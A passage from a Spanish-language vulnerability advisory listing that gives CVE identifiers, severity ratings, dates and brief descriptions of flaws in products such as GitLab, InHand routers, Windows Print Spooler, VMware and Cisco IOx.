    Un control de acceso inapropiado en GitLab CE/EE versiones 12.4 a 14.5.4, 14.5 a 14.6.4 y 12.6 a 14.7.1, permite que personas que no son miembros del proyecto recuperen la dirección de correo electrónico del servicio de asistencia técnica
  • CVE-2022-0390
    Severidad: BAJA
    Fecha de publicación: 01/04/2022
    Fecha de última actualización: 08/08/2023
    Un control de acceso inapropiado en Gitlab CE/EE versiones 12.7 a 14.5.4, 14.6 a 14.6.4 y 14.7 a 14.7.1, permitía a personas que no eran miembros del proyecto recuperar los detalles de las incidencias cuando estaban vinculadas a un elemento del panel de control de vulnerabilidades
  • CVE-2022-24978
    Severidad: MEDIA
    Fecha de publicación: 05/04/2022
    Fecha de última actualización: 08/08/2023
    Zoho ManageEngine ADAudit Plus versiones anteriores a 7055, permite una escalada de privilegios autenticada en productos integrados. Esto ocurre porque un campo de contraseña está presente en una respuesta JSON
  • CVE-2021-44538
    Severidad: ALTA
    Fecha de publicación: 14/12/2021
    Fecha de última actualización: 08/08/2023
    La función olm_session_describe en Matrix libolm versiones anteriores a 3.2.7, es vulnerable a un desbordamiento de búfer. El objeto Olm session representa un canal criptográfico entre dos partes. Por lo tanto, su estado es parcialmente controlable por la parte remota del canal. Los atacantes pueden construir una secuencia de mensajes manipulada para manipular el estado de la sesión del receptor de tal manera que, para algunos tamaños de búfer, se produzca un desbordamiento de búfer en una llamada a olm_session_describe. Además, los tamaños de búfer seguros no estaban documentados. El contenido del desbordamiento es parcialmente controlable por el atacante y se limita a espacios y dígitos ASCII. Los productos afectados conocidos son Element Web y SchildiChat Web
  • CVE-2021-45081
    Severidad: MEDIA
    Fecha de publicación: 20/02/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en Cobbler versiones hasta 3.3.1. Las rutinas en varios archivos usan el protocolo HTTP en lugar del más seguro HTTPS
  • CVE-2021-1732
    Severidad: MEDIA
    Fecha de publicación: 25/02/2021
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Elevación de Privilegios de Win32k de Windows. Este ID de CVE es diferente de CVE-2021-1698
  • CVE-2022-23699
    Severidad: MEDIA
    Fecha de publicación: 04/04/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado una vulnerabilidad de omisión de restricción de autenticación local en HPE OneView versión(es): Anteriores a 6.6. HPE ha proporcionado una actualización de software para resolver esta vulnerabilidad en HPE OneView
  • CVE-2022-23700
    Severidad: BAJA
    Fecha de publicación: 04/04/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado una vulnerabilidad de acceso de lectura local no autorizada a archivos en HPE OneView versión(es): Anteriores a 6.6. HPE ha proporcionado una actualización de software para resolver esta vulnerabilidad en HPE OneView
  • CVE-2022-0741
    Severidad: MEDIA
    Fecha de publicación: 01/04/2022
    Fecha de última actualización: 08/08/2023
    Una comprobación de entrada inapropiada en todas las versiones de GitLab CE/EE usando sendmail para enviar correos electrónicos permitía a un atacante robar variables de entorno por medio de direcciones de correo electrónico especialmente diseñadas
  • CVE-2022-23900
    Severidad: ALTA
    Fecha de publicación: 07/04/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de inyección de comandos en la API del router Wavlink WL-WN531P3, versión M31G3.V5030.201204, permite a un atacante lograr una ejecución de código remota no autorizada por medio de una petición POST maliciosa mediante el archivo /cgi-bin/adm.cgi
  • CVE-2022-27819
    Severidad: MEDIA
    Fecha de publicación: 07/04/2022
    Fecha de última actualización: 08/08/2023
    SWHKD versión 1.1.5 permite un análisis no seguro por medio de la opción -c. Puede producirse un filtrado de información, pero se presenta una simple denegación de servicio (agotamiento de memoria) al intentar analizar un archivo grande o infinito (como un dispositivo de bloques o caracteres)
  • CVE-2021-43453
    Severidad: ALTA
    Fecha de publicación: 07/04/2022
    Fecha de última actualización: 08/08/2023
    Se presenta una vulnerabilidad de desbordamiento de búfer en la región Heap de la memoria en JerryScript versiones 2.4.0 y anteriores, por medio de una lectura fuera de límites en la función parser_parse_for_statement_start en el archivo js-parser-statm.c. Este problema es similar a CVE-2020-29657
  • CVE-2022-26850
    Severidad: MEDIA
    Fecha de publicación: 06/04/2022
    Fecha de última actualización: 08/08/2023
    Cuando son creadas o actualizadas las credenciales para el acceso de un solo usuario, Apache NiFi escribe una copia de la configuración de los proveedores de identidad de inicio de sesión en el directorio temporal del sistema operativo. En la mayoría de las plataformas, el directorio temporal del sistema operativo presenta permisos de lectura globales. NiFi movió inmediatamente el archivo temporal al directorio de configuración final, lo que limitó significativamente la ventana de oportunidad de acceso. NiFi versión 1.16.0 incluye actualizaciones para sustituir la configuración de los proveedores de identidad de inicio de sesión sin escribir un archivo en el directorio temporal del sistema operativo
  • CVE-2021-41752
    Severidad: ALTA
    Fecha de publicación: 05/04/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de desbordamiento de pila en Jerryscript versiones anteriores al commit e1ce7dd7271288be8c0c8136eea9107df73a8ce2 del 20 de octubre de 2021 debido a una llamada recursiva no limitada a la función new opt()
  • CVE-2022-27128
    Severidad: ALTA
    Fecha de publicación: 10/04/2022
    Fecha de última actualización: 08/08/2023
    Un problema de control de acceso incorrecto en el archivo/admin/run_ajax.php en zbzcms versión v1.0 permite a atacantes añadir arbitrariamente cuentas de administrador
  • CVE-2022-28365
    Severidad: MEDIA
    Fecha de publicación: 09/04/2022
    Fecha de última actualización: 08/08/2023
    Reprise License Manager versión 14.2, está afectado por una vulnerabilidad de divulgación de información por medio de una petición GET a /goforms/rlminfo. No es requerida autenticación. La información divulgada está asociada a versiones de software, IDs de procesos, configuración de red, nombre(s) de host, arquitectura del sistema y detalles de archivos/directorios
  • CVE-2022-26591
    Severidad: MEDIA
    Fecha de publicación: 06/04/2022
    Fecha de última actualización: 08/08/2023
    FANTEC GmbH MWiD25-DS Firmware versión v2.000.030, permite a atacantes no autenticados acceder y descargar archivos arbitrarios por medio de una petición GET diseñada
  • CVE-2022-20079
    Severidad: BAJA
    Fecha de publicación: 11/04/2022
    Fecha de última actualización: 08/08/2023
    En vow, se presenta una posible lectura de datos no inicializados debido a una comprobación de entrada inapropiada. Esto podría conllevar a una divulgación de información local con los privilegios de ejecución System requeridos. No es requerida una interacción del usuario para su explotación. ID del Parche: ALPS05837742; ID de Incidencia: ALPS05857289
  • CVE-2021-28714
    Severidad: BAJA
    Fecha de publicación: 06/01/2022
    Fecha de última actualización: 08/08/2023
    Un huésped puede forzar al controlador de netback de Linux a acaparar grandes cantidades de memoria del kernel E[ste registro de información CNA es relacionado con múltiples CVEs; el texto explica qué aspectos/vulnerabilidades corresponden a cada CVE]. Los paquetes de datos entrantes para un huésped en el controlador de netback del kernel de Linux son almacenados en el búfer hasta que el huésped está listo para procesarlos. Son tomadas algunas medidas para evitar que sean acumulados demasiados datos, pero éstas pueden ser obviadas por el huésped: Se presenta un tiempo de espera en el que el lado del cliente de una interfaz puede dejar de consumir nuevos paquetes antes de que sea asumido que ha sido estancado, pero este tiempo de espera es bastante largo (60 segundos por defecto). Usando una conexión UDP en una interfaz rápida pueden acumularse fácilmente gigabytes de datos en ese tiempo. (CVE-2021-28715) El tiempo de espera podría incluso no dispararse nunca si el huésped consigue tener sólo una ranura libre en su página de anillo de cola RX y el siguiente paquete requeriría más de una ranura libre, lo que puede ser el caso cuando se usa OSG, XDP o hashing de software. (CVE-2021-28714)
  • CVE-2022-22572
    Severidad: MEDIA
    Fecha de publicación: 11/04/2022
    Fecha de última actualización: 08/08/2023
    Un usuario no administrador con permiso de administración de usuarios puede escalar su privilegio a usuario administrador por medio de la funcionalidad de restablecimiento de contraseña. La vulnerabilidad afecta a Incapptic Connect versiones anteriores a 1.40.1
  • CVE-2022-20070
    Severidad: MEDIA
    Fecha de publicación: 11/04/2022
    Fecha de última actualización: 08/08/2023
    En ssmr, se presenta una posible escritura fuera de límites debido a una falta de comprobación de límites. Esto podría conllevar a una escalada local de privilegios con los privilegios de ejecución System requeridos. No es requerida una interacción del usuario para su explotación. ID del Parche: ALPS06362920; ID de Incidencia: ALPS06362920
  • CVE-2022-27268
    Severidad: ALTA
    Fecha de publicación: 10/04/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que InHand Networks InRouter 900 Industrial 4G Router versiones anteriores a 1.0.0.r11700, contenía una vulnerabilidad de ejecución de código remota (RCE) por medio del componente get_cgi_from_memory. Esta vulnerabilidad es desencadenada por medio de un paquete diseñado
  • CVE-2022-27269
    Severidad: ALTA
    Fecha de publicación: 10/04/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que InHand Networks InRouter 900 Industrial 4G Router versiones anteriores a v1.0.0.r11700, contiene una vulnerabilidad de ejecución de código remota (RCE) por medio del componente config_ovpn. Esta vulnerabilidad es desencadenada por medio de un paquete diseñado
  • CVE-2022-27270
    Severidad: ALTA
    Fecha de publicación: 10/04/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que InHand Networks InRouter 900 Industrial 4G Router versiones anteriores a 1.0.0.r11700, contiene una vulnerabilidad de ejecución de código remota (RCE) por medio del componente ipsec_secrets. Esta vulnerabilidad es desencadenada por medio de un paquete diseñado
  • CVE-2022-27271
    Severidad: ALTA
    Fecha de publicación: 10/04/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que InHand Networks InRouter 900 Industrial 4G Router versiones anteriores a 1.0.0.r11700, contenía una vulnerabilidad de ejecución de código remota (RCE) por medio del componente python-lib. Esta vulnerabilidad es desencadenada por medio de un paquete diseñado
  • CVE-2022-27272
    Severidad: ALTA
    Fecha de publicación: 10/04/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que InHand Networks InRouter 900 Industrial 4G Router versiones anteriores a v1.0.0.r11700, contenía una vulnerabilidad de ejecución de código remota (RCE) por medio de la función sub_1791C. Esta vulnerabilidad es desencadenada por medio de un paquete diseñado
  • CVE-2022-27273
    Severidad: ALTA
    Fecha de publicación: 10/04/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que InHand Networks InRouter 900 Industrial 4G Router versiones anteriores a 1.0.0.r11700, contenía una vulnerabilidad de ejecución de código remota (RCE) por medio de la función sub_12168. Esta vulnerabilidad es desencadenada por medio de un paquete diseñado
  • CVE-2022-27274
    Severidad: ALTA
    Fecha de publicación: 10/04/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que InHand Networks InRouter 900 Industrial 4G Router antes de la v1.0.0.r11700, contenía una vulnerabilidad de ejecución de código remota (RCE) por medio de la función sub_12028. Esta vulnerabilidad es desencadenada por medio de un paquete diseñado
  • CVE-2022-27275
    Severidad: ALTA
    Fecha de publicación: 10/04/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que InHand Networks InRouter 900 Industrial 4G Router versiones anteriores a 1.0.0.r11700, contenía una vulnerabilidad de ejecución de código remota (RCE) por medio de la función sub_122D0. Esta vulnerabilidad es desencadenada por medio de un paquete diseñado
  • CVE-2022-27276
    Severidad: ALTA
    Fecha de publicación: 10/04/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que InHand Networks InRouter 900 Industrial 4G Router versiones anteriores a v1.0.0.r11700, contenía una vulnerabilidad de ejecución de código remota (RCE) por medio de la función sub_10F2C. Esta vulnerabilidad es desencadenada por medio de un paquete diseñado
  • CVE-2022-23176
    Severidad: ALTA
    Fecha de publicación: 24/02/2022
    Fecha de última actualización: 08/08/2023
    Los dispositivos WatchGuard Firebox y XTM permiten que un atacante remoto con credenciales no privilegiadas acceda al sistema con una sesión de gestión privilegiada a través del acceso de gestión expuesto. Esta vulnerabilidad afecta al sistema operativo Fireware antes de la versión 12.7.2_U1, 12.x antes de la versión 12.1.3_U3, y 12.2.x hasta 12.5.x antes de la versión 12.5.7_U3
  • CVE-2022-26803
    Severidad: ALTA
    Fecha de publicación: 15/04/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Windows Print Spooler. Este ID de CVE es diferente de CVE-2022-26786, CVE-2022-26787, CVE-2022-26789, CVE-2022-26790, CVE-2022-26791, CVE-2022-26792, CVE-2022-26793, CVE-2022-26794, CVE-2022-26795, CVE-2022-26796, CVE-2022-26797, CVE-2022-26798, CVE-2022-26801, CVE-2022-26802
  • CVE-2022-0117
    Severidad: MEDIA
    Fecha de publicación: 11/02/2022
    Fecha de última actualización: 08/08/2023
    Una omisión de políticas en Blink en Google Chrome versiones anteriores a 97.0.4692.71, permitía a un atacante remoto filtrar datos de origen cruzado por medio de una página HTML diseñada
  • CVE-2022-0110
    Severidad: MEDIA
    Fecha de publicación: 11/02/2022
    Fecha de última actualización: 08/08/2023
    Una implementación incorrecta de la Interfaz de seguridad en Autofill en Google Chrome versiones anteriores a 97.0.4692.71, permitía a un atacante remoto falsificar el contenido de la Omnibox (barra de URL) por medio de una página HTML diseñada
  • CVE-2022-26798
    Severidad: ALTA
    Fecha de publicación: 15/04/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Windows Print Spooler. Este ID de CVE es diferente de CVE-2022-26786, CVE-2022-26787, CVE-2022-26789, CVE-2022-26790, CVE-2022-26791, CVE-2022-26792, CVE-2022-26793, CVE-2022-26794, CVE-2022-26795, CVE-2022-26796, CVE-2022-26797, CVE-2022-26801, CVE-2022-26802, CVE-2022-26803
  • CVE-2022-26797
    Severidad: MEDIA
    Fecha de publicación: 15/04/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Windows Print Spooler. Este ID de CVE es diferente de CVE-2022-26786, CVE-2022-26787, CVE-2022-26789, CVE-2022-26790, CVE-2022-26791, CVE-2022-26792, CVE-2022-26793, CVE-2022-26794, CVE-2022-26795, CVE-2022-26796, CVE-2022-26798, CVE-2022-26801, CVE-2022-26802, CVE-2022-26803
  • CVE-2022-22254
    Severidad: MEDIA
    Fecha de publicación: 11/04/2022
    Fecha de última actualización: 08/08/2023
    se presenta una vulnerabilidad de omisión de permisos cuando las CAs de NFC acceden al TEE. Una explotación con éxito de esta vulnerabilidad puede afectar a la confidencialidad de los datos
  • CVE-2022-26796
    Severidad: MEDIA
    Fecha de publicación: 15/04/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Windows Print Spooler. Este ID de CVE es diferente de CVE-2022-26786, CVE-2022-26787, CVE-2022-26789, CVE-2022-26790, CVE-2022-26791, CVE-2022-26792, CVE-2022-26793, CVE-2022-26794, CVE-2022-26795, CVE-2022-26797, CVE-2022-26798, CVE-2022-26801, CVE-2022-26802, CVE-2022-26803
  • CVE-2022-26801
    Severidad: MEDIA
    Fecha de publicación: 15/04/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Windows Print Spooler. Este ID de CVE es diferente de CVE-2022-26786, CVE-2022-26787, CVE-2022-26789, CVE-2022-26790, CVE-2022-26791, CVE-2022-26792, CVE-2022-26793, CVE-2022-26794, CVE-2022-26795, CVE-2022-26796, CVE-2022-26797, CVE-2022-26798, CVE-2022-26802, CVE-2022-26803
  • CVE-2022-26802
    Severidad: MEDIA
    Fecha de publicación: 15/04/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Windows Print Spooler. Este ID de CVE es diferente de CVE-2022-26786, CVE-2022-26787, CVE-2022-26789, CVE-2022-26790, CVE-2022-26791, CVE-2022-26792, CVE-2022-26793, CVE-2022-26794, CVE-2022-26795, CVE-2022-26796, CVE-2022-26797, CVE-2022-26798, CVE-2022-26801, CVE-2022-26803
  • CVE-2022-26792
    Severidad: MEDIA
    Fecha de publicación: 15/04/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Windows Print Spooler. Este ID de CVE es diferente de CVE-2022-26786, CVE-2022-26787, CVE-2022-26789, CVE-2022-26790, CVE-2022-26791, CVE-2022-26793, CVE-2022-26794, CVE-2022-26795, CVE-2022-26796, CVE-2022-26797, CVE-2022-26798, CVE-2022-26801, CVE-2022-26802, CVE-2022-26803
  • CVE-2022-26793
    Severidad: MEDIA
    Fecha de publicación: 15/04/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Windows Print Spooler. Este ID de CVE es diferente de CVE-2022-26786, CVE-2022-26787, CVE-2022-26789, CVE-2022-26790, CVE-2022-26791, CVE-2022-26792, CVE-2022-26794, CVE-2022-26795, CVE-2022-26796, CVE-2022-26797, CVE-2022-26798, CVE-2022-26801, CVE-2022-26802, CVE-2022-26803
  • CVE-2022-26794
    Severidad: MEDIA
    Fecha de publicación: 15/04/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Windows Print Spooler. Este ID de CVE es diferente de CVE-2022-26786, CVE-2022-26787, CVE-2022-26789, CVE-2022-26790, CVE-2022-26791, CVE-2022-26792, CVE-2022-26793, CVE-2022-26795, CVE-2022-26796, CVE-2022-26797, CVE-2022-26798, CVE-2022-26801, CVE-2022-26802, CVE-2022-26803
  • CVE-2022-26795
    Severidad: MEDIA
    Fecha de publicación: 15/04/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Windows Print Spooler. Este ID de CVE es diferente de CVE-2022-26786, CVE-2022-26787, CVE-2022-26789, CVE-2022-26790, CVE-2022-26791, CVE-2022-26792, CVE-2022-26793, CVE-2022-26794, CVE-2022-26796, CVE-2022-26797, CVE-2022-26798, CVE-2022-26801, CVE-2022-26802, CVE-2022-26803
  • CVE-2022-26786
    Severidad: MEDIA
    Fecha de publicación: 15/04/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Windows Print Spooler. Este ID de CVE es diferente de CVE-2022-26787, CVE-2022-26789, CVE-2022-26790, CVE-2022-26791, CVE-2022-26792, CVE-2022-26793, CVE-2022-26794, CVE-2022-26795, CVE-2022-26796, CVE-2022-26797, CVE-2022-26798, CVE-2022-26801, CVE-2022-26802, CVE-2022-26803
  • CVE-2022-26787
    Severidad: MEDIA
    Fecha de publicación: 15/04/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Windows Print Spooler. Este ID de CVE es diferente de CVE-2022-26786, CVE-2022-26789, CVE-2022-26790, CVE-2022-26791, CVE-2022-26792, CVE-2022-26793, CVE-2022-26794, CVE-2022-26795, CVE-2022-26796, CVE-2022-26797, CVE-2022-26798, CVE-2022-26801, CVE-2022-26802, CVE-2022-26803
  • CVE-2022-29080
    Severidad: ALTA
    Fecha de publicación: 12/04/2022
    Fecha de última actualización: 08/08/2023
    El paquete npm-dependency-versions versiones hasta 0.3.0 para Node.js, permite la inyección de comandos si un atacante es capaz de llamar a dependencyVersions con un objeto JSON en el que pkgs es una clave, y se presentan meta caracteres de shell en un valor
  • CVE-2022-26789
    Severidad: MEDIA
    Fecha de publicación: 15/04/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Windows Print Spooler. Este ID de CVE es diferente de CVE-2022-26786, CVE-2022-26787, CVE-2022-26790, CVE-2022-26791, CVE-2022-26792, CVE-2022-26793, CVE-2022-26794, CVE-2022-26795, CVE-2022-26796, CVE-2022-26797, CVE-2022-26798, CVE-2022-26801, CVE-2022-26802, CVE-2022-26803
  • CVE-2022-26790
    Severidad: MEDIA
    Fecha de publicación: 15/04/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Windows Print Spooler. Este ID de CVE es diferente de CVE-2022-26786, CVE-2022-26787, CVE-2022-26789, CVE-2022-26791, CVE-2022-26792, CVE-2022-26793, CVE-2022-26794, CVE-2022-26795, CVE-2022-26796, CVE-2022-26797, CVE-2022-26798, CVE-2022-26801, CVE-2022-26802, CVE-2022-26803
  • CVE-2022-26791
    Severidad: MEDIA
    Fecha de publicación: 15/04/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Windows Print Spooler. Este ID de CVE es diferente de CVE-2022-26786, CVE-2022-26787, CVE-2022-26789, CVE-2022-26790, CVE-2022-26792, CVE-2022-26793, CVE-2022-26794, CVE-2022-26795, CVE-2022-26796, CVE-2022-26797, CVE-2022-26798, CVE-2022-26801, CVE-2022-26802, CVE-2022-26803
  • CVE-2022-24530
    Severidad: MEDIA
    Fecha de publicación: 15/04/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios de Windows Installer. Este ID de CVE es diferente de CVE-2022-24499
  • CVE-2022-24489
    Severidad: MEDIA
    Fecha de publicación: 15/04/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Cluster Client Failover (CCF)
  • CVE-2022-28773
    Severidad: MEDIA
    Fecha de publicación: 12/04/2022
    Fecha de última actualización: 21/07/2023
    Debido a una recursión no controlada en SAP Web Dispatcher y SAP Internet Communication Manager, la aplicación puede bloquearse, conllevando a una denegación de servicio, pero puede reiniciarse automáticamente
  • CVE-2021-39805
    Severidad: BAJA
    Fecha de publicación: 12/04/2022
    Fecha de última actualización: 08/08/2023
    En la función l2cble_process_sig_cmd del archivo l2c_ble.cc, se presenta una posible lectura fuera de límites debido a una falta de comprobación de límites. Esto podría conllevar a una divulgación remota de información mediante Bluetooth sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-12 Android-12L, ID de Android: A-212694559
  • CVE-2022-23702
    Severidad: MEDIA
    Fecha de publicación: 12/04/2022
    Fecha de última actualización: 08/08/2023
    Se ha identificado una posible vulnerabilidad de seguridad en los servidores HPE Superdome Flex y Superdome Flex 280. La vulnerabilidad podría ser explotada localmente para permitir a un usuario con acceso de administrador escalar su privilegio. La vulnerabilidad ha sido resuelta en la última actualización del firmware. Servidor HPE Superdome Flex versiones 3.50.58 y posteriores, servidor HPE Superdome Flex 280 versiones 1.20.204 y posteriores
  • CVE-2022-22955
    Severidad: ALTA
    Fecha de publicación: 13/04/2022
    Fecha de última actualización: 08/08/2023
    VMware Workspace ONE Access presenta dos vulnerabilidades de omisión de autenticación (CVE-2022-22955 y CVE-2022-22956) en el marco OAuth2 ACS. Un actor malicioso puede omitir el mecanismo de autenticación y ejecutar cualquier operación debido a los endpoints expuestos en el marco de autenticación
  • CVE-2022-24767
    Severidad: MEDIA
    Fecha de publicación: 12/04/2022
    Fecha de última actualización: 02/08/2023
    GitHub: El desinstalador de Git para Windows es vulnerable al secuestro de DLL cuando se ejecuta bajo la cuenta de usuario SYSTEM
  • CVE-2022-22958
    Severidad: MEDIA
    Fecha de publicación: 13/04/2022
    Fecha de última actualización: 08/08/2023
    VMware Workspace ONE Access, Identity Manager y vRealize Automation contienen dos vulnerabilidades de ejecución de código remota (CVE-2022-22957 y CVE-2022-22958). Un actor malicioso con acceso administrativo puede desencadenar la deserialización de datos no confiables mediante un URI JDBC malicioso que puede resultar en una ejecución de código remota
  • CVE-2022-22960
    Severidad: ALTA
    Fecha de publicación: 13/04/2022
    Fecha de última actualización: 08/08/2023
    VMware Workspace ONE Access, Identity Manager y vRealize Automation contienen una vulnerabilidad de escalada de privilegios debido a permisos inapropiados en scripts de soporte. Un actor malicioso con acceso local puede escalar los privilegios a "root"
  • CVE-2022-22961
    Severidad: MEDIA
    Fecha de publicación: 13/04/2022
    Fecha de última actualización: 08/08/2023
    VMware Workspace ONE Access, Identity Manager y vRealize Automation contienen una vulnerabilidad de divulgación de información debido a una devolución de información excesiva. Un actor malicioso con acceso remoto puede filtrar el nombre de host del sistema de destino. Una explotación con éxito de este problema puede conllevar a una selección de víctimas
  • CVE-2022-27814
    Severidad: BAJA
    Fecha de publicación: 14/04/2022
    Fecha de última actualización: 08/08/2023
    SWHKD versión 1.1.5, permite realizar pruebas arbitrarias de existencia de archivos por medio de la opción -c
  • CVE-2022-24788
    Severidad: ALTA
    Fecha de publicación: 13/04/2022
    Fecha de última actualización: 02/08/2023
    Vyper es un Lenguaje de Contratos Inteligentes pitónicos para la máquina virtual de Ethereum. Las versiones de vyper anteriores a 0.3.2, sufren un potencial desbordamiento del búfer. La importación de una función desde una interfaz JSON que devuelve "bytes" genera bytecode que no sujeta la longitud de los bytes, resultando potencialmente en un desbordamiento del búfer. Es recomendado a usuarios actualizar. No se presentan medidas de mitigación conocidas para este problema
  • Vulnerabilidad en Microsoft Dynamics 365 (on-premises) (CVE-2022-23259)
    Severidad: ALTA
    Fecha de publicación: 15/04/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Ejecución de Código Remota de Microsoft Dynamics 365 (on-premises)
  • CVE-2022-24521
    Severidad: MEDIA
    Fecha de publicación: 15/04/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Windows Common Log File System Driver. Este ID de CVE es diferente de CVE-2022-24481
  • CVE-2022-27257
    Severidad: MEDIA
    Fecha de publicación: 15/04/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Inclusión de Archivos Locales en PHP en el tema Redbasic por defecto para Hubzilla versiones anteriores a 7.2 permite a atacantes remotos incluir archivos php arbitrarios por medio del parámetro schema
  • CVE-2022-24474
    Severidad: MEDIA
    Fecha de publicación: 15/04/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Windows Win32k. Este ID de CVE es diferente de CVE-2022-24542
  • CVE-2022-24479
    Severidad: MEDIA
    Fecha de publicación: 15/04/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Connected User Experiences and Telemetry
  • CVE-2022-24481
    Severidad: MEDIA
    Fecha de publicación: 15/04/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios de Windows Common Log File System Driver. Este ID de CVE es diferente de CVE-2022-24521
  • CVE-2021-44488
    Severidad: MEDIA
    Fecha de publicación: 15/04/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en YottaDB versiones hasta r1.32 y V7.0-000. Usando una entrada diseñada, los atacantes pueden controlar el tamaño y la entrada de las llamadas a memcpy en la función op_fnfnumber en el archivo sr_port/op_fnfnumber.c para corromper la memoria o bloquear la aplicación
  • CVE-2022-24845
    Severidad: ALTA
    Fecha de publicación: 13/04/2022
    Fecha de última actualización: 02/08/2023
    Vyper es un Lenguaje de Contrato Inteligente pitónico para la máquina virtual de Ethereum. En las versiones afectadas, el retorno de "(iface).returns_int128()" no es comprobado que esté dentro de los límites de "int128". Este problema puede resultar en una mala interpretación del valor entero y conllevar a un comportamiento incorrecto. A partir de la versión 0.3.0, "(iface).returns_int128()" es comprobado en expresiones simples, pero no en expresiones complejas. Es recomendado a usuarios actualizar. No se presenta medidas de mitigación conocidas para este problema
  • Vulnerabilidad en los ID de transacción de DNS en Nucleus 4, Nucleus NET, Nucleus RTOS, Nucleus ReadyStart, Nucleus Source Code, SIMOTICS CONNECT 400, SIMOTICS CONNECT 400 y VSTAR (CVE-2021-25677)
    Severidad: MEDIA
    Fecha de publicación: 22/04/2021
    Fecha de última actualización: 08/08/2023
    Se ha identificado una vulnerabilidad en Nucleus NET (Todas las versiones), Nucleus ReadyStart V3 (Todas las versiones anteriores a la versión V2017.02.3), Nucleus ReadyStart V4 (Todas las versiones anteriores a la versión V4.1.0), Nucleus Source Code (Versiones que incluyen los módulos DNS afectados), SIMOTICS CONNECT 400 (Todas las versiones anteriores a la versión V0.5.0.0), SIMOTICS CONNECT 400 (Todas las versiones posteriores o iguales a la versión V0.5.0.0 anteriores a la versión V1.0.0). El cliente DNS no aleatoriza correctamente los ID de las transacciones DNS. Esto podría permitir a un atacante envenenar la caché DNS o falsificar la resolución DNS
  • Vulnerabilidad en la funcionalidad de descompresión de registros de nombres de dominio de DNS en Nucleus 4, Nucleus NET, Nucleus RTOS, Nucleus ReadyStart, Nucleus Source Code, SIMOTICS CONNECT 400 y VSTAR (CVE-2020-27738)
    Severidad: MEDIA
    Fecha de publicación: 22/04/2021
    Fecha de última actualización: 08/08/2023
    Se ha identificado una vulnerabilidad en Nucleus NET (Todas las versiones), Nucleus ReadyStart V3 (Todas las versiones anteriores a V2017.02.3), Nucleus ReadyStart V4 (Todas las versiones anteriores a V4.1.0), Nucleus Source Code (Versiones que incluyen los módulos DNS afectados), SIMOTICS CONNECT 400 (Todas las versiones anteriores a V0.5.0.0). La funcionalidad de descompresión de registros de nombres de dominio DNS no valida correctamente los valores de desplazamiento de puntero. El análisis sintáctico de respuestas malformadas podría dar lugar a un acceso de lectura más allá del final de una estructura asignada. Un atacante con una posición privilegiada en la red podría aprovechar esta vulnerabilidad para provocar una condición de denegación de servicio
  • CVE-2022-20726
    Severidad: MEDIA
    Fecha de publicación: 15/04/2022
    Fecha de última actualización: 24/07/2023
    Múltiples vulnerabilidades en el entorno de alojamiento de aplicaciones Cisco IOx en varias plataformas de Cisco podrían permitir a un atacante inyectar comandos arbitrarios en el sistema operativo del host subyacente, ejecutar código arbitrario en el sistema operativo del host subyacente, instalar aplicaciones sin ser autenticado o conducir un ataque de tipo cross-site scripting (XSS) contra un usuario del software afectado. Para más información sobre estas vulnerabilidades, consulte la sección Details de este aviso
  • CVE-2022-20723
    Severidad: ALTA
    Fecha de publicación: 15/04/2022
    Fecha de última actualización: 24/07/2023
    Múltiples vulnerabilidades en el entorno de alojamiento de aplicaciones Cisco IOx en varias plataformas de Cisco podrían permitir a un atacante inyectar comandos arbitrarios en el sistema operativo anfitrión subyacente, ejecutar código arbitrario en el sistema operativo anfitrión subyacente, instalar aplicaciones sin ser autenticado o conducir un ataque de tipo cross-site scripting (XSS) contra un usuario del software afectado. Para más información sobre estas vulnerabilidades, consulte la sección Details de este aviso
  • CVE-2022-22391
    Severidad: MEDIA
    Fecha de publicación: 14/04/2022
    Fecha de última actualización: 08/08/2023
